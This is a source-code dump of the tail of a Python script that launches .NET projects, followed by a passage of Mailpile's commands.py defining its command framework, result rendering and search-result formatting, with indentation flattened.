if 'test' in pro.lower()
]
runnable_projects = [
pro for pro in all_pros
if 'test' not in pro.lower()
]
exec_pros: List[str] = []
if command == 'test':
exec_pros = test_projects
else:
exec_pros = runnable_projects
for project in exec_pros:
print_green(project)
job = Process(target=run, args=(project, command, watch_mode))
job.start()
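if __name__ == '__main__':
    # Usage sketch only; the directory and service name below are placeholders.
    # This would start every non-test *.csproj under ~/repos/my-service in watch mode.
    start_service(
        working_directory=path.expanduser('~/repos'),
        service_name='my-service',
        command='run',
        watch_mode=True,
    )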
|
commands.py
|
# These are the Mailpile commands, the public "API" we expose for searching,
# tagging and editing e-mail.
#
import copy
import datetime
import json
import os
import os.path
import random
import re
import shlex
import socket
import subprocess
import sys
import traceback
import threading
import time
import unicodedata
import webbrowser
import mailpile.util
import mailpile.ui
import mailpile.postinglist
from mailpile.crypto.gpgi import GnuPG
from mailpile.eventlog import Event
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import IsMailbox
from mailpile.mailutils import AddressHeaderParser, ClearParseCache
from mailpile.mailutils import ExtractEmails, ExtractEmailAndName, Email
from mailpile.postinglist import GlobalPostingList
from mailpile.safe_popen import MakePopenUnsafe, MakePopenSafe
from mailpile.search import MailIndex
from mailpile.util import *
from mailpile.vcard import AddressInfo
class Command(object):
"""Generic command object all others inherit from"""
SYNOPSIS = (None, # CLI shortcode, e.g. A:
None, # CLI shortname, e.g. add
None, # API endpoint, e.g. sys/addmailbox
None) # Positional argument list
SYNOPSIS_ARGS = None # New-style positional argument list
API_VERSION = None
UI_CONTEXT = None
IS_USER_ACTIVITY = False
IS_HANGING_ACTIVITY = False
IS_INTERACTIVE = False
CONFIG_REQUIRED = True
COMMAND_CACHE_TTL = 0 # < 1 = Not cached
CHANGES_SESSION_CONTEXT = False
FAILURE = 'Failed: %(name)s %(args)s'
ORDER = (None, 0)
SPLIT_ARG = True # Uses shlex by default
RAISES = (UsageError, UrlRedirectException)
WITH_CONTEXT = ()
# Event logging settings
LOG_NOTHING = False
LOG_ARGUMENTS = True
LOG_PROGRESS = False
LOG_STARTING = '%(name)s: Starting'
LOG_FINISHED = '%(name)s: %(message)s'
# HTTP settings (note: security!)
HTTP_CALLABLE = ('GET', )
HTTP_POST_VARS = {}
HTTP_QUERY_VARS = {}
HTTP_BANNED_VARS = {}
HTTP_STRICT_VARS = True
HTTP_AUTH_REQUIRED = True
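    # Illustrative sketch (not a real Mailpile command) of how subclasses fill in
    # the attributes above; every name below is made up:
    #
    #     class HelloWorld(Command):
    #         """Say hello to someone"""
    #         SYNOPSIS = (None, 'hello', 'hello', '[<name>]')
    #         ORDER = ('Internals', 99)
    #         HTTP_CALLABLE = ('GET', )
    #
    #         def command(self):
    #             name = self.args[0] if self.args else 'world'
    #             return self._success(_('Said hello'), result={'hello': name})
    #
    # The base class drives command() via run()/_run_sync() below and wraps its
    # return value in a CommandResult for rendering as text, JSON or HTML.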
class CommandResult:
def __init__(self, command_obj, session,
command_name, doc, result, status, message,
template_id=None, kwargs={}, error_info={}):
self.session = session
self.command_obj = command_obj
self.command_name = command_name
self.kwargs = {}
self.kwargs.update(kwargs)
self.template_id = template_id
self.doc = doc
self.result = result
self.status = status
self.error_info = {}
self.error_info.update(error_info)
self.message = message
self.rendered = {}
self.renderers = {
'json': self.as_json,
'html': self.as_html,
'text': self.as_text,
'css': self.as_css,
'rss': self.as_rss,
'xml': self.as_xml,
'txt': self.as_txt,
'js': self.as_js
}
def __nonzero__(self):
return (self.result and True or False)
def as_(self, what, *args, **kwargs):
if args or kwargs:
# Args render things un-cacheable.
return self.renderers.get(what)(*args, **kwargs)
if what not in self.rendered:
self.rendered[what] = self.renderers.get(what, self.as_text)()
return self.rendered[what]
def as_text(self):
if isinstance(self.result, bool):
happy = '%s: %s' % (self.result and _('OK') or _('Failed'),
self.message or self.doc)
if not self.result and self.error_info:
return '%s\n%s' % (happy,
json.dumps(self.error_info, indent=4,
default=mailpile.util.json_helper))
else:
return happy
elif isinstance(self.result, (dict, list, tuple)):
return json.dumps(self.result, indent=4, sort_keys=True,
default=mailpile.util.json_helper)
else:
return unicode(self.result)
__str__ = lambda self: self.as_text()
__unicode__ = lambda self: self.as_text()
def as_dict(self):
from mailpile.urlmap import UrlMap
rv = {
'command': self.command_name,
'state': {
'command_url': UrlMap.ui_url(self.command_obj),
'context_url': UrlMap.context_url(self.command_obj),
'query_args': self.command_obj.state_as_query_args(),
'cache_id': self.command_obj.cache_id(),
'context': self.command_obj.context or ''
},
'status': self.status,
'message': self.message,
'result': self.result,
'event_id': self.command_obj.event.event_id,
'elapsed': '%.3f' % self.session.ui.time_elapsed,
}
if self.error_info:
rv['error'] = self.error_info
for ui_key in [k for k in self.kwargs.keys()
if k.startswith('ui_')]:
rv[ui_key] = self.kwargs[ui_key]
return rv
def as_json(self):
return self.session.ui.render_json(self.as_dict())
def as_html(self, template=None):
return self.as_template('html', template)
def as_js(self, template=None):
return self.as_template('js', template)
def as_css(self, template=None):
return self.as_template('css', template)
def as_rss(self, template=None):
return self.as_template('rss', template)
def as_xml(self, template=None):
return self.as_template('xml', template)
def as_txt(self, template=None):
return self.as_template('txt', template)
def as_template(self, etype, template=None):
what = ''.join((etype, '/' if template else '', template or ''))
for e in ('jhtml', 'jjs', 'jcss', 'jxml', 'jrss'):
if self.session.ui.render_mode.endswith(e):
what += ':content'
if what in self.rendered:
return self.rendered[what]
tpath = self.command_obj.template_path(
etype, template_id=self.template_id, template=template)
data = self.as_dict()
data['title'] = self.message
def render():
return self.session.ui.render_web(
self.session.config, [tpath], data)
if what.endswith(':content'):
data['render_mode'] = 'content'
data['result'] = render()
self.rendered[what] = self.session.ui.render_json(data)
else:
data['render_mode'] = 'full'
self.rendered[what] = render()
return self.rendered[what]
def __init__(self, session, name=None, arg=None, data=None, async=False):
self.session = session
self.context = None
self.name = self.SYNOPSIS[1] or self.SYNOPSIS[2] or name
self.data = data or {}
self.status = 'unknown'
self.message = name
self.error_info = {}
self.result = None
self.run_async = async
if type(arg) in (type(list()), type(tuple())):
self.args = tuple(arg)
elif arg:
if self.SPLIT_ARG is True:
try:
self.args = tuple([a.decode('utf-8') for a in
shlex.split(arg.encode('utf-8'))])
except (ValueError, UnicodeEncodeError, UnicodeDecodeError):
raise UsageError(_('Failed to parse arguments'))
else:
self.args = (arg, )
else:
self.args = tuple([])
if 'arg' in self.data:
self.args = tuple(list(self.args) + self.data['arg'])
self._create_event()
def state_as_query_args(self):
args = {}
if self.args:
args['arg'] = self._sloppy_copy(self.args)
args.update(self._sloppy_copy(self.data))
return args
def cache_id(self, sqa=None):
if self.COMMAND_CACHE_TTL < 1:
return ''
from mailpile.urlmap import UrlMap
args = sorted(list((sqa or self.state_as_query_args()).iteritems()))
# The replace() stuff makes these usable as CSS class IDs
return ('%s-%s' % (UrlMap.ui_url(self), md5_hex(str(args)))
).replace('/', '-').replace('.', '-')
def cache_requirements(self, result):
raise NotImplementedError('Cachable commands should override this, '
'returning a set() of requirements.')
def cache_result(self, result):
if self.COMMAND_CACHE_TTL > 0:
try:
cache_id = self.cache_id()
if cache_id:
self.session.config.command_cache.cache_result(
cache_id,
time.time() + self.COMMAND_CACHE_TTL,
self.cache_requirements(result),
self,
result)
self.session.ui.mark(_('Cached result as %s') % cache_id)
except (ValueError, KeyError, TypeError, AttributeError):
self._ignore_exception()
def template_path(self, etype, template_id=None, template=None):
path_parts = (template_id or self.SYNOPSIS[2] or 'command').split('/')
if len(path_parts) == 1:
path_parts.append('index')
if template not in (None, etype, 'as.' + etype):
# Security: The template request may come from the URL, so we
# sanitize it very aggressively before heading off
# to the filesystem.
clean_tpl = CleanText(template.replace('.%s' % etype, ''),
banned=(CleanText.FS +
CleanText.WHITESPACE))
path_parts[-1] += '-%s' % clean_tpl
path_parts[-1] += '.' + etype
return os.path.join(*path_parts)
def _gnupg(self):
return GnuPG(self.session.config)
def _config(self):
session, config = self.session, self.session.config
if not config.loaded_config:
config.load(session)
parent = session
config.prepare_workers(session, daemons=self.IS_INTERACTIVE)
if self.IS_INTERACTIVE and not config.daemons_started():
config.prepare_workers(session, daemons=True)
return config
def _idx(self, reset=False, wait=True, wait_all=True, quiet=False):
session, config = self.session, self._config()
if not reset and config.index:
return config.index
def __do_load2():
config.vcards.load_vcards(session)
if not wait_all:
session.ui.report_marks(quiet=quiet)
def __do_load1():
with config.interruptable_wait_for_lock():
if reset:
config.index = None
session.results = []
session.searched = []
session.displayed = None
idx = config.get_index(session)
if wait_all:
__do_load2()
if not wait:
session.ui.report_marks(quiet=quiet)
return idx
if wait:
rv = __do_load1()
session.ui.reset_marks(quiet=quiet)
else:
config.save_worker.add_task(session, 'Load', __do_load1)
rv = None
if not wait_all:
config.save_worker.add_task(session, 'Load2', __do_load2)
return rv
def _background_save(self,
everything=False, config=False,
index=False, index_full=False,
wait=False, wait_callback=None):
session, cfg = self.session, self.session.config
aut = cfg.save_worker.add_unique_task
if everything or config:
aut(session, 'Save config', lambda: cfg.save(session))
if cfg.index:
cfg.flush_mbox_cache(session, clear=False, wait=wait)
if index_full:
aut(session, 'Save index', lambda: self._idx().save(session))
elif everything or index:
aut(session, 'Save index changes',
lambda: self._idx().save_changes(session))
if wait:
wait_callback = wait_callback or (lambda: True)
cfg.save_worker.do(session, 'Waiting', wait_callback)
def _choose_messages(self, words, allow_ephemeral=False):
msg_ids = set()
all_words = []
for word in words:
all_words.extend(word.split(','))
for what in all_words:
if what.lower() == 'these':
if self.session.displayed:
b = self.session.displayed['stats']['start'] - 1
c = self.session.displayed['stats']['count']
msg_ids |= set(self.session.results[b:b + c])
else:
self.session.ui.warning(_('No results to choose from!'))
elif what.lower() == 'all':
if self.session.results:
msg_ids |= set(self.session.results)
else:
self.session.ui.warning(_('No results to choose from!'))
elif what.startswith('='):
try:
msg_id = int(what[1:], 36)
if msg_id >= 0 and msg_id < len(self._idx().INDEX):
msg_ids.add(msg_id)
else:
self.session.ui.warning((_('No such ID: %s')
) % (what[1:], ))
except ValueError:
if allow_ephemeral and '-' in what:
msg_ids.add(what[1:])
else:
self.session.ui.warning(_('What message is %s?'
) % (what, ))
elif '-' in what:
try:
b, e = what.split('-')
msg_ids |= set(self.session.results[int(b) - 1:int(e)])
except (ValueError, KeyError, IndexError, TypeError):
self.session.ui.warning(_('What message is %s?'
) % (what, ))
else:
try:
msg_ids.add(self.session.results[int(what) - 1])
except (ValueError, KeyError, IndexError, TypeError):
self.session.ui.warning(_('What message is %s?'
) % (what, ))
return msg_ids
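    # Examples of the selectors _choose_messages understands (illustrative):
    #     'all'          -> every message in the current search results
    #     'these'        -> the messages currently being displayed
    #     '3', '1-5,8'   -> 1-based positions within the current results
    #     '=1a'          -> an absolute message ID in base 36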
def _error(self, message, info=None, result=None):
self.status = 'error'
self.message = message
ui_message = _('%s error: %s') % (self.name, message)
if info:
self.error_info.update(info)
details = ' '.join(['%s=%s' % (k, info[k]) for k in info])
ui_message += ' (%s)' % details
self.session.ui.mark(self.name)
self.session.ui.error(ui_message)
if result:
return self.view(result)
else:
return False
def _success(self, message, result=True):
self.status = 'success'
self.message = message
ui_message = '%s: %s' % (self.name, message)
self.session.ui.mark(ui_message)
return self.view(result)
def _read_file_or_data(self, fn):
if fn in self.data:
return self.data[fn]
else:
return open(fn, 'rb').read()
def _ignore_exception(self):
self.session.ui.debug(traceback.format_exc())
def _serialize(self, name, function):
return function()
def _background(self, name, function):
session, config = self.session, self.session.config
return config.slow_worker.add_task(session, name, function)
def _update_event_state(self, state, log=False):
self.event.flags = state
self.event.data['elapsed'] = int(1000 * (time.time()-self._start_time))
if (log or self.LOG_PROGRESS) and not self.LOG_NOTHING:
self.event.data['ui'] = str(self.session.ui.__class__.__name__)
self.event.data['output'] = self.session.ui.render_mode
if self.session.config.event_log:
self.session.config.event_log.log_event(self.event)
def _starting(self):
self._start_time = time.time()
self._update_event_state(Event.RUNNING)
if self.name:
self.session.ui.start_command(self.name, self.args, self.data)
def _fmt_msg(self, message):
return message % {'name': self.name,
'status': self.status or '',
'message': self.message or ''}
def _sloppy_copy(self, data, name=None):
if name and 'pass' == name[:4]:
data = '(SUPPRESSED)'
def copy_value(v):
try:
unicode(v).encode('utf-8')
return unicode(v)[:1024]
except (UnicodeEncodeError, UnicodeDecodeError):
return '(BINARY DATA)'
if isinstance(data, (list, tuple)):
return [self._sloppy_copy(i, name=name) for i in data]
elif isinstance(data, dict):
return dict((k, self._sloppy_copy(v, name=k))
for k, v in data.iteritems())
else:
return copy_value(data)
def _create_event(self):
private_data = {}
if self.LOG_ARGUMENTS:
if self.data:
private_data['data'] = self._sloppy_copy(self.data)
if self.args:
private_data['args'] = self._sloppy_copy(self.args)
self.event = self._make_command_event(private_data)
def _make_command_event(self, private_data):
return Event(source=self,
message=self._fmt_msg(self.LOG_STARTING),
flags=Event.INCOMPLETE,
data={},
private_data=private_data)
def _finishing(self, rv, just_cleanup=False):
if just_cleanup:
self._update_finished_event()
return rv
if not self.context:
self.context = self.session.get_context(
update=self.CHANGES_SESSION_CONTEXT)
self.session.ui.mark(_('Generating result'))
result = self.CommandResult(self, self.session, self.name,
self.__doc__,
rv, self.status, self.message,
error_info=self.error_info)
self.cache_result(result)
if not self.run_async:
self._update_finished_event()
self.session.last_event_id = self.event.event_id
return result
def _update_finished_event(self):
# Update the event!
if self.message:
self.event.message = self.message
if self.error_info:
self.event.private_data['error_info'] = self.error_info
self.event.message = self._fmt_msg(self.LOG_FINISHED)
self._update_event_state(Event.COMPLETE, log=True)
self.session.ui.mark(self.event.message)
self.session.ui.report_marks(
details=('timing' in self.session.config.sys.debug))
if self.name:
self.session.ui.finish_command(self.name)
def _run_sync(self, enable_cache, *args, **kwargs):
try:
self._starting()
self._run_args = args
self._run_kwargs = kwargs
if (self.COMMAND_CACHE_TTL > 0 and
'http' not in self.session.config.sys.debug and
enable_cache):
cid = self.cache_id()
try:
rv = self.session.config.command_cache.get_result(cid)
rv.session.ui = self.session.ui
if self.CHANGES_SESSION_CONTEXT:
self.session.copy(rv.session, ui=False)
self.session.ui.mark(_('Using pre-cached result object %s') % cid)
self._finishing(True, just_cleanup=True)
return rv
except:
pass
def command(self, *args, **kwargs):
if self.CONFIG_REQUIRED:
if not self.session.config.loaded_config:
return self._error(_('Please log in'))
if mailpile.util.QUITTING:
return self._error(_('Shutting down'))
return self.command(*args, **kwargs)
return self._finishing(command(self, *args, **kwargs))
except self.RAISES:
self.status = 'success'
self._finishing(True, just_cleanup=True)
raise
except:
self._ignore_exception()
self._error(self.FAILURE % {'name': self.name,
'args': ' '.join(self.args)})
return self._finishing(False)
def _run(self, *args, **kwargs):
if self.run_async:
def streetcar():
try:
with MultiContext(self.WITH_CONTEXT):
rv = self._run_sync(True, *args, **kwargs).as_dict()
self.event.private_data.update(rv)
self._update_finished_event()
except:
traceback.print_exc()
self._starting()
self._update_event_state(self.event.RUNNING, log=True)
result = Command.CommandResult(self, self.session, self.name,
self.__doc__,
{"resultid": self.event.event_id},
"success",
"Running in background")
self.session.config.async_worker.add_task(self.session, self.name,
streetcar)
return result
else:
return self._run_sync(True, *args, **kwargs)
def run(self, *args, **kwargs):
with MultiContext(self.WITH_CONTEXT):
if self.IS_USER_ACTIVITY:
try:
mailpile.util.LAST_USER_ACTIVITY = time.time()
mailpile.util.LIVE_USER_ACTIVITIES += 1
return self._run(*args, **kwargs)
finally:
mailpile.util.LIVE_USER_ACTIVITIES -= 1
else:
return self._run(*args, **kwargs)
def refresh(self):
self._create_event()
return self._run_sync(False, *self._run_args, **self._run_kwargs)
def command(self):
return None
def etag_data(self):
return []
def max_age(self):
return 0
@classmethod
def view(cls, result):
return result
##[ Shared basic Search Result class]#########################################
class SearchResults(dict):
_NAME_TITLES = ('the', 'mr', 'ms', 'mrs', 'sir', 'dr', 'lord')
def _name(self, sender, short=True, full_email=False):
words = re.sub('["<>]', '', sender).split()
        nomail = [w for w in words if '@' not in w]
if nomail:
if short:
if len(nomail) > 1 and nomail[0].lower() in self._NAME_TITLES:
return nomail[1]
return nomail[0]
return ' '.join(nomail)
elif words:
if not full_email:
return words[0].split('@', 1)[0]
return words[0]
return '(nobody)'
def _names(self, senders):
if len(senders) > 1:
names = {}
for sender in senders:
sname = self._name(sender)
names[sname] = names.get(sname, 0) + 1
namelist = names.keys()
namelist.sort(key=lambda n: -names[n])
return ', '.join(namelist)
if len(senders) < 1:
return '(no sender)'
if senders:
return self._name(senders[0], short=False)
return ''
def _compact(self, namelist, maxlen):
l = len(namelist)
while l > maxlen:
namelist = re.sub(', *[^, \.]+, *', ',,', namelist, 1)
if l == len(namelist):
break
l = len(namelist)
namelist = re.sub(',,,+, *', ' .. ', namelist, 1)
return namelist
TAG_TYPE_FLAG_MAP = {
'trash': 'trash',
'spam': 'spam',
'ham': 'ham',
'drafts': 'draft',
'blank': 'draft',
'sent': 'from_me',
'outbox': 'from_me',
'replied': 'replied',
'fwded': 'forwarded'
}
def _metadata(self, msg_info):
import mailpile.urlmap
nz = lambda l: [v for v in l if v]
msg_ts = long(msg_info[MailIndex.MSG_DATE], 36)
msg_date = datetime.datetime.fromtimestamp(msg_ts)
fe, fn = ExtractEmailAndName(msg_info[MailIndex.MSG_FROM])
f_info = self._address(e=fe, n=fn)
f_info['aid'] = (self._msg_addresses(msg_info, no_to=True, no_cc=True)
or [''])[0]
expl = {
'mid': msg_info[MailIndex.MSG_MID],
'id': msg_info[MailIndex.MSG_ID],
'timestamp': msg_ts,
'from': f_info,
'to_aids': self._msg_addresses(msg_info, no_from=True, no_cc=True),
'cc_aids': self._msg_addresses(msg_info, no_from=True, no_to=True),
'msg_kb': int(msg_info[MailIndex.MSG_KB], 36),
'tag_tids': sorted(self._msg_tags(msg_info)),
'thread_mid': msg_info[MailIndex.MSG_THREAD_MID],
'subject': msg_info[MailIndex.MSG_SUBJECT],
'body': MailIndex.get_body(msg_info),
'flags': {
},
'crypto': {
}
}
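        # At this point 'expl' holds the base metadata (mid, id, timestamp,
        # from/to_aids/cc_aids, msg_kb, tag_tids, thread_mid, subject, body);
        # the code below fills in 'flags', 'crypto' and, for non-ephemeral
        # messages, 'urls'.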
# Ephemeral messages do not have URLs
if '-' in msg_info[MailIndex.MSG_MID]:
expl['flags'].update({
'ephemeral': True,
'draft': True,
})
else:
expl['urls'] = {
'thread': self.urlmap.url_thread(msg_info[MailIndex.MSG_MID]),
'source': self.urlmap.url_source(msg_info[MailIndex.MSG_MID]),
}
# Support rich snippets
if expl['body']['snippet'].startswith('{'):
try:
expl['body'] = json.loads(expl['body']['snippet'])
except ValueError:
pass
# Misc flags
sender_vcard = self.idx.config.vcards.get_vcard(fe.lower())
if sender_vcard:
if sender_vcard.kind == 'profile':
expl['flags']['from_me'] = True
tag_types = [self.idx.config.get_tag(t).type for t in expl['tag_tids']]
for t in self.TAG_TYPE_FLAG_MAP:
if t in tag_types:
expl['flags'][self.TAG_TYPE_FLAG_MAP[t]] = True
# Check tags for signs of encryption or signatures
tag_slugs = [self.idx.config.get_tag(t).slug for t in expl['tag_tids']]
for t in tag_slugs:
if t.startswith('mp_sig'):
expl['crypto']['signature'] = t[7:]
elif t.startswith('mp_enc'):
expl['crypto']['encryption'] = t[7:]
# Extra behavior for editable messages
if 'draft' in expl['flags']:
if 'ephemeral' in expl['flags']:
pass
elif self.idx.config.is_editable_message(msg_info):
expl['urls']['editing'] = self.urlmap.url_edit(expl['mid'])
else:
del expl['flags']['draft']
return expl
def _msg_addresses(self, msg_info=None, addresses=[],
no_from=False, no_to=False, no_cc=False):
cids = set()
for ai in addresses:
try:
cids.add(b36(self.idx.EMAIL_IDS[ai.address.lower()]))
except KeyError:
cids.add(b36(self.idx._add_email(ai.address, name=ai.fn)))
if msg_info:
if not no_to:
to = [t for t in msg_info[MailIndex.MSG_TO].split(',') if t]
cids |= set(to)
if not no_cc:
cc = [t for t in msg_info[MailIndex.MSG_CC].split(',') if t]
cids |= set(cc)
if not no_from:
fe, fn = ExtractEmailAndName(msg_info[MailIndex.MSG_FROM])
if fe:
try:
cids.add(b36(self.idx.EMAIL_IDS[fe.lower()]))
except KeyError:
cids.add(b36(self.idx._add_email(fe, name=fn)))
return sorted(list(cids))
def _address(self, cid=None, e=None, n=None):
if cid and not (e and n):
e, n = ExtractEmailAndName(self.idx.EMAILS[int(cid, 36)])
vcard = self.session.config.vcards.get_vcard(e)
if vcard and '@' in n:
n = vcard.fn
return AddressInfo(e, n, vcard=vcard)
def _msg_tags(self, msg_info):
tids = [t for t in msg_info[MailIndex.MSG_TAGS].split(',')
if t and t in self.session.config.tags]
return tids
def _tag(self, tid, attributes={}):
return dict_merge(self.session.config.get_tag_info(tid), attributes)
def _thread(self, thread_mid):
msg_info = self.idx.get_msg_at_idx_pos(int(thread_mid, 36))
thread = [i for i in msg_info[MailIndex.MSG_REPLIES].split(',') if i]
# FIXME: This is a hack, the indexer should just keep things
# in the right order on rescan. Fixing threading is a bigger
# problem though, so we do this for now.
def thread_sort_key(idx):
            info = self.idx.get_msg_at_idx_pos(int(idx, 36))
return int(info[self.idx.MSG_DATE], 36)
thread.sort(key=thread_sort_key)
return thread
WANT_MSG_TREE = ('attachments', 'html_parts', 'text_parts', 'header_list',
'editing_strings', 'crypto')
PRUNE_MSG_TREE = ('headers', ) # Added by editing_strings
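    # get_message_tree(want=...) can pull in extra keys as side effects (e.g.
    # 'headers' arrives along with 'editing_strings'); _prune_msg_tree() strips
    # anything that is not explicitly wanted before the tree is returned.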
def _prune_msg_tree(self, tree):
for k in tree.keys():
if k not in self.WANT_MSG_TREE or k in self.PRUNE_MSG_TREE:
del tree[k]
return tree
def _message(self, email):
tree = email.get_message_tree(want=(email.WANT_MSG_TREE_PGP +
self.WANT_MSG_TREE))
email.evaluate_pgp(tree, decrypt=True)
editing_strings = tree.get('editing_strings')
if editing_strings:
for key in ('from', 'to', 'cc', 'bcc'):
if key in editing_strings:
cids = self._msg_addresses(
addresses=AddressHeaderParser(
unicode_data=editing_strings[key]))
editing_strings['%s_aids' % key] = cids
for cid in cids:
if cid not in self['data']['addresses']:
self['data']['addresses'
][cid] = self._address(cid=cid)
return self._prune_msg_tree(tree)
def __init__(self, session, idx,
results=None, start=0, end=None, num=None,
emails=None, people=None,
suppress_data=False, full_threads=True):
dict.__init__(self)
self.session = session
self.people = people
self.emails = emails
self.idx = idx
self.urlmap = mailpile.urlmap.UrlMap(self.session)
results = self.results = results or session.results or []
num = num or session.config.prefs.num_results
if end:
start = end - num
if start > len(results):
start = len(results)
if start < 0:
start = 0
try:
threads = [b36(r) for r in results[start:start + num]]
except TypeError:
results = threads = []
start = end = 0
self.session.ui.mark(_('Parsing metadata for %d results '
'(full_threads=%s)') % (len(threads),
full_threads))
self.update({
'summary': _('Search: %s') % ' '.join(session.searched),
'stats': {
'count': len(threads),
'start': start + 1,
'end': start + min(num, len(results)-start),
'total': len(results),
},
'search_terms': session.searched,
'address_ids': [],
'message_ids': [],
'thread_ids': threads,
})
if 'tags' in self.session.config:
search_tags = [idx.config.get_tag(t.split(':')[1], {})
for t in session.searched
if t.startswith('in:') or t.startswith('tag:')]
search_tag_ids = [t._key for t in search_tags if t]
self.update({
'search_tag_ids': search_tag_ids,
})
if search_tag_ids:
self['summary'] = ' & '.join([t.name for t
in search_tags if t])
else:
search_tag_ids = []
if suppress_data or (not results and not emails):
return
self.update({
'data': {
'addresses': {},
'metadata': {},
'messages': {},
'threads': {}
}
})
if 'tags' in self.session.config:
th = self['data']['tags'] = {}
for tid in search_tag_ids:
if tid not in th:
th[tid] = self._tag(tid, {'searched': True})
idxs = results[start:start + num]
while idxs:
idx_pos = idxs.pop(0)
msg_info = idx.get_msg_at_idx_pos(idx_pos)
self.add_msg_info(b36(idx_pos), msg_info,
full_threads=full_threads, idxs=idxs)
if emails and len(emails) == 1:
self['summary'] = emails[0].get_msg_info(MailIndex.MSG_SUBJECT)
for e in emails or []:
self.add_email(e)
def add_msg_info(self, mid, msg_info, full_threads=False, idxs=None):
# Populate data.metadata
self['data']['metadata'][mid] = self._metadata(msg_info)
# Populate data.thread
thread_mid = msg_info[self.idx.MSG_THREAD_MID]
if thread_mid not in self['data']['threads']:
thread = self._thread(thread_mid)
self['data']['threads'][thread_mid] = thread
if full_threads and idxs:
idxs.extend([int(t, 36) for t in thread
if t not in self['data']['metadata']])
# Populate data.person
for cid in self._msg_addresses(msg_info):
if cid not in self['data']['addresses']:
self['data']['addresses'][cid] = self._address(cid=cid)
# Populate data.tag
if 'tags' in self.session.config:
for tid in self._msg_tags(msg_info):
if tid not in self['data']['tags']:
self['data']['tags'][tid] = self._tag(tid,
{"searched": False})
def add_email(self, e):
if e not in self.emails:
self.emails.append(e)
mid = e.msg_mid()
if mid not in self['data']['messages']:
self['data']['messages'][mid] = self._message(e)
if mid not in self['message_ids']:
self['message_ids'].append(mid)
# This happens last, as the parsing above may have side-effects
# which matter once we get this far.
self.add_msg_info(mid, e.get_msg_info(uncached=True))
def __nonzero__(self):
return True
def next_set(self):
stats = self['stats']
return SearchResults(self.session, self.idx,
start=stats['start'] - 1 + stats['count'])
def previous_set(self):
stats = self['stats']
return SearchResults(self.session, self.idx,
end=stats['start'] - 1)
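    # _fix_width() truncates/pads to a display width where east-asian 'W'/'F'
    # characters count as two columns: e.g. _fix_width(u'abc', 5) -> 'abc  ',
    # while a single wide character at width 3 is kept and padded with one
    # space.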
def _fix_width(self, text, width):
chars = []
for c in unicode(text):
cwidth = 2 if (unicodedata.east_asian_width(c) in 'WF') else 1
if cwidth <= width:
chars.append(c)
width -= cwidth
else:
break
if width:
chars += [' ' * width]
return ''.join(chars)
def as_text(self):
from mailpile.www.jinjaextensions import MailpileCommand as JE
clen = max(3, len('%d' % len(self.session.results)))
cfmt = '%%%d.%ds' % (clen, clen)
term_width = self.session.ui.term.max_width()
fs_width = int((22 + 53) * (term_width / 79.0))
f_width = min(32, int(0.30 * fs_width))
s_width = fs_width - f_width
text = []
count = self['stats']['start']
expand_ids = [e.msg_idx_pos for e in (self.emails or [])]
addresses = self.get('data', {}).get('addresses', {})
for mid in self['thread_ids']:
m = self['data']['metadata'][mid]
tags = [self['data']['tags'][t] for t in m['tag_tids']]
tag_names = [t['name'] for t in tags
if not t.get('searched', False)
and t.get('label', True)
and t.get('display', '') != 'invisible']
tag_new = [t for t in tags if t.get('type') == 'unread']
tag_names.sort()
msg_meta = tag_names and (' (' + '('.join(tag_names)) or ''
# FIXME: this is a bit ugly, but useful for development
es = ['', '']
for t in [t['slug'] for t in tags]:
if t.startswith('mp_enc') and 'none' not in t:
es[1] = 'E'
if t.startswith('mp_sig') and 'none' not in t:
es[0] = 'S'
es = ''.join([e for e in es if e])
if es:
msg_meta = (msg_meta or ' ') + ('[%s]' % es)
elif msg_meta:
msg_meta += ')'
else:
msg_meta += ' '
msg_meta += elapsed_datetime(m['timestamp'])
from_info = (m['from'].get('fn') or m['from'].get('email')
or '(anonymous)')
if from_info[:1] in ('<', '"', '\''):
from_info = from_info[1:]
if from_info[-1:] in ('>', '"', '\''):
from_info = from_info[:-1]
if '@' in from_info and len(from_info) > 18:
e, d = from_info.split('@', 1)
if d in ('gmail.com', 'yahoo.com', 'hotmail.com'):
from_info = '%s@%s..' % (e, d[0])
else:
from_info = '%s..@%s' % (e[0], d)
if not expand_ids:
def gg(pos):
return (pos < 10) and pos or '>'
thread = [m['thread_mid']]
thread += self['data']['threads'][m['thread_mid']]
if m['mid'] not in thread:
thread.append(m['mid'])
pos = thread.index(m['mid']) + 1
if pos > 1:
from_info = '%s>%s' % (gg(pos-1), from_info)
else:
from_info = ' ' + from_info
if pos < len(thread):
from_info = '%s>%s' % (from_info[:20], gg(len(thread)-pos))
subject = re.sub('^(\\[[^\\]]{6})[^\\]]{3,}\\]\\s*', '\\1..] ',
JE._nice_subject(m))
subject_width = max(1, s_width - (clen + len(msg_meta)))
subject = self._fix_width(subject, subject_width)
from_info = self._fix_width(from_info, f_width)
#sfmt = '%%s%%s' % (subject_width, subject_width)
#ffmt = ' %%s%%s' % (f_width, f_width)
tfmt = cfmt + ' %s%s%s%s'
text.append(tfmt % (count, from_info, tag_new and '*' or ' ',
subject, msg_meta))
if mid in self['data'].get('messages', {}):
exp_email = self.emails[expand_ids.index(int(mid, 36))]
msg_tree = exp_email.get_message_tree()
text.append('-' * term_width)
text.append(exp_email.get_editing_string(msg_tree,
attachment_headers=False).strip())
if msg_tree['attachments']:
text.append('\nAttachments:')
for a in msg_tree['attachments']:
text.append('%5.5s %s' % ('#%s' % a['count'],
a['filename']))
text.append('-' * term_width)
count += 1
if not count:
text = ['(No messages found)']
return '\n'.join(text) + '\n'
##[ Internals ]###############################################################
class Load(Command):
"""Load or reload the metadata index"""
SYNOPSIS = (None, 'load', None, None)
ORDER = ('Internals', 1)
CONFIG_REQUIRED = False
IS_INTERACTIVE = True
def command(self, reset=True, wait=True, wait_all=False, quiet=False):
try:
if self._idx(reset=reset,
wait=wait,
wait_all=wait_all,
quiet=quiet):
return self._success(_('Loaded metadata index'))
else:
                return self._error(_('Failed to load metadata index'))
except IOError:
return self._error(_('Failed to decrypt configuration, '
'please log in!'))
class Rescan(Command):
"""Add new messages to index"""
SYNOPSIS = (None, 'rescan', 'rescan',
'[full|vcards|vcards:<src>|both|mailboxes|sources|<msgs>]')
ORDER = ('Internals', 2)
LOG_PROGRESS = True
HTTP_CALLABLE = ('POST',)
HTTP_POST_VARS = {
'which': '[full|vcards|vcards:<src>|both|mailboxes|sources|<msgs>]'
}
def command(self, slowly=False):
session, config, idx = self.session, self.session.config, self._idx()
args = list(self.args)
if 'which' in self.data:
args.extend(self.data['which'])
# Pretend we're idle, to make rescan go fast fast.
if not slowly:
